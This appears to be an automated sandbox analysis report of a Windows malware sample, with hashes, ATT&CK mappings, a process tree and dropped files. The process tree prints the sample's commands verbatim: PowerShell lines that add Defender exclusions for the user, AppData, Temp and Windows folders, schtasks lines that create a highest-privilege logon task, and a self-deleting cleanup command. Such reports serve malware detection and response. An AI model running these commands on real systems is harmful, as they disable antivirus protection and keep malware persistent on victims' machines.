0caf1ae312a99cde7514f5d02e6ceb22664119d9e8e3275eee9aca77faf6064e

Analysis

max time kernel
144s
max time network
121s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
12/02/2024, 10:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

96e9e209995b72f190f3e471220e03af.exe
Size

33KB
MD5

96e9e209995b72f190f3e471220e03af
SHA1

18ceac50034f1c929d3234e57718cecfcadd374d
SHA256

0caf1ae312a99cde7514f5d02e6ceb22664119d9e8e3275eee9aca77faf6064e
SHA512

249b3960f2151a8f121e5e78fb9f76f0b5556f1a23b1058a64680b0b30a4fdd09120e3f90f448df4c01414392be87869c3cab482ea4145e9688912140d4e1e90
SSDEEP

768:hJv6oMKlsISL1yWbYilyQjJjxvnRPWUg65YCdF99FmJR:hJv6oMKlsIoyWsilyqvnR+vhSF9nmR

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 4 IoCs

pid	Process
2348	svchost32.exe
2020	services32.exe
1916	svchost32.exe
1440	sihost32.exe

Loads dropped DLL 4 IoCs

pid	Process
2472	cmd.exe
2348	svchost32.exe
1348	cmd.exe
1916	svchost32.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
7	raw.githubusercontent.com
8	raw.githubusercontent.com

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\Microsoft\Telemetry\sihost32.exe	svchost32.exe
File created	C:\Windows\system32\Microsoft\Telemetry\sihost32.log	svchost32.exe
File created	C:\Windows\system32\services32.exe	svchost32.exe
File opened for modification	C:\Windows\system32\services32.exe	svchost32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1996	schtasks.exe
2124	schtasks.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	svchost32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	svchost32.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
1512	powershell.exe
2852	powershell.exe
2956	powershell.exe
2656	powershell.exe
2348	svchost32.exe
1536	powershell.exe
2576	powershell.exe
488	powershell.exe
1868	powershell.exe
1916	svchost32.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	1512	powershell.exe
Token: SeDebugPrivilege	2852	powershell.exe
Token: SeDebugPrivilege	2956	powershell.exe
Token: SeDebugPrivilege	2656	powershell.exe
Token: SeDebugPrivilege	2348	svchost32.exe
Token: SeDebugPrivilege	1536	powershell.exe
Token: SeDebugPrivilege	2576	powershell.exe
Token: SeDebugPrivilege	488	powershell.exe
Token: SeDebugPrivilege	1868	powershell.exe
Token: SeDebugPrivilege	1916	svchost32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1048 wrote to memory of 2524	1048	96e9e209995b72f190f3e471220e03af.exe	28
PID 1048 wrote to memory of 2524	1048	96e9e209995b72f190f3e471220e03af.exe	28
PID 1048 wrote to memory of 2524	1048	96e9e209995b72f190f3e471220e03af.exe	28
PID 2524 wrote to memory of 1512	2524	cmd.exe	30
PID 2524 wrote to memory of 1512	2524	cmd.exe	30
PID 2524 wrote to memory of 1512	2524	cmd.exe	30
PID 2524 wrote to memory of 2852	2524	cmd.exe	31
PID 2524 wrote to memory of 2852	2524	cmd.exe	31
PID 2524 wrote to memory of 2852	2524	cmd.exe	31
PID 2524 wrote to memory of 2956	2524	cmd.exe	32
PID 2524 wrote to memory of 2956	2524	cmd.exe	32
PID 2524 wrote to memory of 2956	2524	cmd.exe	32
PID 2524 wrote to memory of 2656	2524	cmd.exe	33
PID 2524 wrote to memory of 2656	2524	cmd.exe	33
PID 2524 wrote to memory of 2656	2524	cmd.exe	33
PID 1048 wrote to memory of 2472	1048	96e9e209995b72f190f3e471220e03af.exe	34
PID 1048 wrote to memory of 2472	1048	96e9e209995b72f190f3e471220e03af.exe	34
PID 1048 wrote to memory of 2472	1048	96e9e209995b72f190f3e471220e03af.exe	34
PID 2472 wrote to memory of 2348	2472	cmd.exe	36
PID 2472 wrote to memory of 2348	2472	cmd.exe	36
PID 2472 wrote to memory of 2348	2472	cmd.exe	36
PID 2348 wrote to memory of 1028	2348	svchost32.exe	37
PID 2348 wrote to memory of 1028	2348	svchost32.exe	37
PID 2348 wrote to memory of 1028	2348	svchost32.exe	37
PID 1028 wrote to memory of 1996	1028	cmd.exe	39
PID 1028 wrote to memory of 1996	1028	cmd.exe	39
PID 1028 wrote to memory of 1996	1028	cmd.exe	39
PID 2348 wrote to memory of 2020	2348	svchost32.exe	40
PID 2348 wrote to memory of 2020	2348	svchost32.exe	40
PID 2348 wrote to memory of 2020	2348	svchost32.exe	40
PID 2348 wrote to memory of 1636	2348	svchost32.exe	41
PID 2348 wrote to memory of 1636	2348	svchost32.exe	41
PID 2348 wrote to memory of 1636	2348	svchost32.exe	41
PID 2020 wrote to memory of 292	2020	services32.exe	43
PID 2020 wrote to memory of 292	2020	services32.exe	43
PID 2020 wrote to memory of 292	2020	services32.exe	43
PID 1636 wrote to memory of 1620	1636	cmd.exe	45
PID 1636 wrote to memory of 1620	1636	cmd.exe	45
PID 1636 wrote to memory of 1620	1636	cmd.exe	45
PID 292 wrote to memory of 1536	292	cmd.exe	46
PID 292 wrote to memory of 1536	292	cmd.exe	46
PID 292 wrote to memory of 1536	292	cmd.exe	46
PID 292 wrote to memory of 2576	292	cmd.exe	47
PID 292 wrote to memory of 2576	292	cmd.exe	47
PID 292 wrote to memory of 2576	292	cmd.exe	47
PID 292 wrote to memory of 488	292	cmd.exe	48
PID 292 wrote to memory of 488	292	cmd.exe	48
PID 292 wrote to memory of 488	292	cmd.exe	48
PID 292 wrote to memory of 1868	292	cmd.exe	49
PID 292 wrote to memory of 1868	292	cmd.exe	49
PID 292 wrote to memory of 1868	292	cmd.exe	49
PID 2020 wrote to memory of 1348	2020	services32.exe	50
PID 2020 wrote to memory of 1348	2020	services32.exe	50
PID 2020 wrote to memory of 1348	2020	services32.exe	50
PID 1348 wrote to memory of 1916	1348	cmd.exe	52
PID 1348 wrote to memory of 1916	1348	cmd.exe	52
PID 1348 wrote to memory of 1916	1348	cmd.exe	52
PID 1916 wrote to memory of 1168	1916	svchost32.exe	53
PID 1916 wrote to memory of 1168	1916	svchost32.exe	53
PID 1916 wrote to memory of 1168	1916	svchost32.exe	53
PID 1916 wrote to memory of 1440	1916	svchost32.exe	55
PID 1916 wrote to memory of 1440	1916	svchost32.exe	55
PID 1916 wrote to memory of 1440	1916	svchost32.exe	55
PID 1168 wrote to memory of 2124	1168	cmd.exe	56

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\96e9e209995b72f190f3e471220e03af.exe
"C:\Users\Admin\AppData\Local\Temp\96e9e209995b72f190f3e471220e03af.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1048
- C:\Windows\system32\cmd.exe
  "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2524
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1512
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2852
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2956
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2656
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\96e9e209995b72f190f3e471220e03af.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2472
- - C:\Users\Admin\AppData\Local\Temp\svchost32.exe
    C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\96e9e209995b72f190f3e471220e03af.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2348
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1028
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
        5⤵
        Creates scheduled task(s)
        
        PID:1996
  - - C:\Windows\system32\services32.exe
      "C:\Windows\system32\services32.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2020
    - - C:\Windows\system32\cmd.exe
        
        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:292
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        6⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1536
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        6⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2576
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        6⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:488
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
        6⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1868
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
        5⤵
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:1348
      - C:\Users\Admin\AppData\Local\Temp\svchost32.exe
        
        C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in System32 directory
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1916
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1168
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
        8⤵
        Creates scheduled task(s)
        
        PID:2124
        
        C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
        
        "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
        7⤵
        Executes dropped EXE
        
        PID:1440
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
        7⤵
        
        PID:2736
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        8⤵
        
        PID:2976
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1636
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:1620

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
e8c83da1da3e3914c2e0f55e9189b41b

SHA1
3234154c8ec079b75a58d0f7222b4e757fa0eeb8

SHA256
7554f08f033f679af0d1b4844b7f03f382ccd5f736bbed2658a4218005fe1579

SHA512
4cd8ab24ba17ab806b1847b303ff4342f447beb5fc4dc98fb596d8d01e86a5d93253c44747cc9004f9e5650e8178775e6ec08cc0abeba869c4f07dd1ebd2199e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CY270IZPO3GMDL39FUVW.temp

Filesize
7KB

MD5
f8edd7c857dbcd1fe8c9bdd842b477b3

SHA1
443219e545c711b4738e4d8181d6f2db46d80ecd

SHA256
9d4d21870fe461fb9c4f336007db649496083872232850a9ed59c71ce4456bd0

SHA512
5718a7d0ade5987478fdbe261f35928b3d25a70b1d28f7c45f2178099f9496dd7a0250d0bf933ab8a5d883ac3dada51d5b313fd4c671885fb8e39dd478652d6b

Download Submit
\Users\Admin\AppData\Local\Temp\svchost32.exe

Filesize
25KB

MD5
6097de3af582394387ed37148cfeb88d

SHA1
c2a525463c505fb91d2b2597b5357636e31ca59f

SHA256
6795fff425a9789f91fc56a9b9729182d444638734b44615ea78ea34953177e1

SHA512
2343fb51968f69651095b57f67062c84a1cea556aecbeb817f707be32f8c647650fe1c7fabdf0c3b00dc0e8625c49bc1ee4d6282d79676c080f798cc25e7afb9

Download Submit
\Windows\System32\Microsoft\Telemetry\sihost32.exe

Filesize
8KB

MD5
549779a60c6a961510880b8826eada2c

SHA1
d401f76327bee6e1989fe6c6710554f59d1815e7

SHA256
993d8c4a7ce2feb70115160f7873e3ae6fca1756b2c73b67f537e7db6e526db9

SHA512
30cd765b6e0fe778c835122c44aa95d6f796e91071002f1781971e2dabc8c62a4e3e0f510adea11313263475c8e819c5de56fabb2558fc37bc1179b57c48cbb0

Download Submit
\Windows\System32\services32.exe

Filesize
33KB

MD5
96e9e209995b72f190f3e471220e03af

SHA1
18ceac50034f1c929d3234e57718cecfcadd374d

SHA256
0caf1ae312a99cde7514f5d02e6ceb22664119d9e8e3275eee9aca77faf6064e

SHA512
249b3960f2151a8f121e5e78fb9f76f0b5556f1a23b1058a64680b0b30a4fdd09120e3f90f448df4c01414392be87869c3cab482ea4145e9688912140d4e1e90

Download Submit
memory/488-107-0x000007FEF24B0000-0x000007FEF2E4D000-memory.dmp

Filesize
9.6MB

Download
memory/488-106-0x0000000002DC0000-0x0000000002E40000-memory.dmp

Filesize
512KB

Download
memory/488-108-0x0000000002DC0000-0x0000000002E40000-memory.dmp

Filesize
512KB

Download
memory/488-110-0x0000000002DC0000-0x0000000002E40000-memory.dmp

Filesize
512KB

Download
memory/488-109-0x0000000002DC0000-0x0000000002E40000-memory.dmp

Filesize
512KB

Download
memory/488-105-0x000007FEF24B0000-0x000007FEF2E4D000-memory.dmp

Filesize
9.6MB

Download
memory/1048-52-0x000000001BEB0000-0x000000001BF30000-memory.dmp

Filesize
512KB

Download
memory/1048-1-0x000007FEF5A10000-0x000007FEF63FC000-memory.dmp

Filesize
9.9MB

Download
memory/1048-41-0x000007FEF5A10000-0x000007FEF63FC000-memory.dmp

Filesize
9.9MB

Download
memory/1048-2-0x000000001BEB0000-0x000000001BF30000-memory.dmp

Filesize
512KB

Download
memory/1048-0-0x000000013F7A0000-0x000000013F7AC000-memory.dmp

Filesize
48KB

Download
memory/1048-57-0x000007FEF5A10000-0x000007FEF63FC000-memory.dmp

Filesize
9.9MB

Download
memory/1512-15-0x000007FEF2D70000-0x000007FEF370D000-memory.dmp

Filesize
9.6MB

Download
memory/1512-12-0x0000000002B70000-0x0000000002BF0000-memory.dmp

Filesize
512KB

Download
memory/1512-8-0x000007FEF2D70000-0x000007FEF370D000-memory.dmp

Filesize
9.6MB

Download
memory/1512-9-0x0000000002B70000-0x0000000002BF0000-memory.dmp

Filesize
512KB

Download
memory/1512-7-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

Filesize
2.9MB

Download
memory/1512-10-0x0000000002810000-0x0000000002818000-memory.dmp

Filesize
32KB

Download
memory/1512-11-0x000007FEF2D70000-0x000007FEF370D000-memory.dmp

Filesize
9.6MB

Download
memory/1512-13-0x0000000002B70000-0x0000000002BF0000-memory.dmp

Filesize
512KB

Download
memory/1512-14-0x0000000002B70000-0x0000000002BF0000-memory.dmp

Filesize
512KB

Download
memory/1536-87-0x000007FEF24B0000-0x000007FEF2E4D000-memory.dmp

Filesize
9.6MB

Download
memory/1536-86-0x00000000029A0000-0x0000000002A20000-memory.dmp

Filesize
512KB

Download
memory/1536-85-0x00000000029A0000-0x0000000002A20000-memory.dmp

Filesize
512KB

Download
memory/1536-84-0x00000000029A0000-0x0000000002A20000-memory.dmp

Filesize
512KB

Download
memory/1536-83-0x000007FEF24B0000-0x000007FEF2E4D000-memory.dmp

Filesize
9.6MB

Download
memory/1536-82-0x00000000029A0000-0x0000000002A20000-memory.dmp

Filesize
512KB

Download
memory/1536-81-0x000007FEF24B0000-0x000007FEF2E4D000-memory.dmp

Filesize
9.6MB

Download
memory/2020-71-0x000000013FD10000-0x000000013FD1C000-memory.dmp

Filesize
48KB

Download
memory/2020-74-0x000000001AF50000-0x000000001AFD0000-memory.dmp

Filesize
512KB

Download
memory/2020-72-0x000007FEF5020000-0x000007FEF5A0C000-memory.dmp

Filesize
9.9MB

Download
memory/2348-64-0x000000001BE80000-0x000000001BF00000-memory.dmp

Filesize
512KB

Download
memory/2348-62-0x000000013F6A0000-0x000000013F6AA000-memory.dmp

Filesize
40KB

Download
memory/2348-63-0x000007FEF5020000-0x000007FEF5A0C000-memory.dmp

Filesize
9.9MB

Download
memory/2348-73-0x000007FEF5020000-0x000007FEF5A0C000-memory.dmp

Filesize
9.9MB

Download
memory/2576-94-0x0000000002CF0000-0x0000000002D70000-memory.dmp

Filesize
512KB

Download
memory/2576-97-0x0000000002CF0000-0x0000000002D70000-memory.dmp

Filesize
512KB

Download
memory/2576-93-0x000007FEEE870000-0x000007FEEF20D000-memory.dmp

Filesize
9.6MB

Download
memory/2576-98-0x000007FEEE870000-0x000007FEEF20D000-memory.dmp

Filesize
9.6MB

Download
memory/2576-96-0x0000000002CF0000-0x0000000002D70000-memory.dmp

Filesize
512KB

Download
memory/2576-95-0x000007FEEE870000-0x000007FEEF20D000-memory.dmp

Filesize
9.6MB

Download
memory/2656-53-0x0000000002AA0000-0x0000000002B20000-memory.dmp

Filesize
512KB

Download
memory/2656-55-0x000007FEF23D0000-0x000007FEF2D6D000-memory.dmp

Filesize
9.6MB

Download
memory/2656-50-0x000007FEF23D0000-0x000007FEF2D6D000-memory.dmp

Filesize
9.6MB

Download
memory/2656-51-0x0000000002AA0000-0x0000000002B20000-memory.dmp

Filesize
512KB

Download
memory/2656-54-0x0000000002AA0000-0x0000000002B20000-memory.dmp

Filesize
512KB

Download
memory/2656-49-0x0000000002AA0000-0x0000000002B20000-memory.dmp

Filesize
512KB

Download
memory/2656-48-0x000007FEF23D0000-0x000007FEF2D6D000-memory.dmp

Filesize
9.6MB

Download
memory/2852-22-0x000007FEF23D0000-0x000007FEF2D6D000-memory.dmp

Filesize
9.6MB

Download
memory/2852-23-0x0000000002150000-0x0000000002158000-memory.dmp

Filesize
32KB

Download
memory/2852-21-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

Filesize
2.9MB

Download
memory/2852-24-0x0000000002A30000-0x0000000002AB0000-memory.dmp

Filesize
512KB

Download
memory/2852-25-0x000007FEF23D0000-0x000007FEF2D6D000-memory.dmp

Filesize
9.6MB

Download
memory/2852-27-0x0000000002A30000-0x0000000002AB0000-memory.dmp

Filesize
512KB

Download
memory/2852-26-0x0000000002A30000-0x0000000002AB0000-memory.dmp

Filesize
512KB

Download
memory/2852-29-0x000007FEF23D0000-0x000007FEF2D6D000-memory.dmp

Filesize
9.6MB

Download
memory/2852-28-0x0000000002A30000-0x0000000002AB0000-memory.dmp

Filesize
512KB

Download
memory/2956-38-0x0000000002AF4000-0x0000000002AF7000-memory.dmp

Filesize
12KB

Download
memory/2956-40-0x0000000002AFB000-0x0000000002B62000-memory.dmp

Filesize
412KB

Download
memory/2956-36-0x0000000002AF0000-0x0000000002B70000-memory.dmp

Filesize
512KB

Download
memory/2956-35-0x000007FEF2D70000-0x000007FEF370D000-memory.dmp

Filesize
9.6MB

Download
memory/2956-37-0x000007FEF2D70000-0x000007FEF370D000-memory.dmp

Filesize
9.6MB

Download
memory/2956-39-0x0000000002AF0000-0x0000000002B70000-memory.dmp

Filesize
512KB

Download
memory/2956-42-0x000007FEF2D70000-0x000007FEF370D000-memory.dmp

Filesize
9.6MB

Download